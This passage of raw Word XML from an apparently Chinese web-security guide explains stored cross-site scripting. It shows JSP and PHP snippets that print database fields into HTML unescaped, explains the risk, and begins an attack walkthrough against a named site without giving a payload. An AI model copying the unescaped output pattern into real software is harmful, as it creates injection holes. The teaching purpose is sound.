    </w:p>
    <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="003F5D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</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3F5D8A" w:rsidTr="00E72C47">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>while(rs.next())</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;%=rs.getInt("id") %&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>=rs.getString("pname")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>%&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;%=rs.getString("pdesc")%&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;%=rs.getString("ptype")%&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;%</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="003F5D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中这几个加粗的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>rs.getInt("id")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i/>
        </w:rPr>
        <w:t>rs.getString("pname")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i/>
        </w:rPr>
        <w:t>rs.getString("pdesc")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i/>
        </w:rPr>
        <w:t>rs.getString("ptype")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，被直接输出到了页面中，没有做任何安全过滤，一旦让用户可以输入数据，都可能导致用户浏览器把“用户可控数据”当成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS/VBS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本执行，或页面元素被“用户可控数据”插入的页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码控制，从而造成攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="003F5D8A"/>
    <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="003F5D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例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3F5D8A" w:rsidTr="00E72C47">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>$row[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>"id"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:i/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>$row[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>"pname"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:i/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>$row[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>"pdesc"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>]?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;td&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>$row[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>"ptype"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>]?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:t>&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;/tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="00E72C47">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009125B0" w:rsidRPr="009125B0" w:rsidRDefault="009125B0" w:rsidP="009125B0"/>
    <w:p w:rsidR="00EA06E8" w:rsidRDefault="00EA06E8" w:rsidP="00EA06E8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击</w:t>
      </w:r>
      <w:r>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果“代码示例”中的代码，是</w:t>
      </w:r>
      <w:r>
        <w:t>17dz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用，恶意用户可以做以下攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加产品时插入恶意脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444D0B13" wp14:editId="5AAEBA6F">
            <wp:extent cx="3586480" cy="2042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6480" cy="2042795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:r>
        <w:rPr>
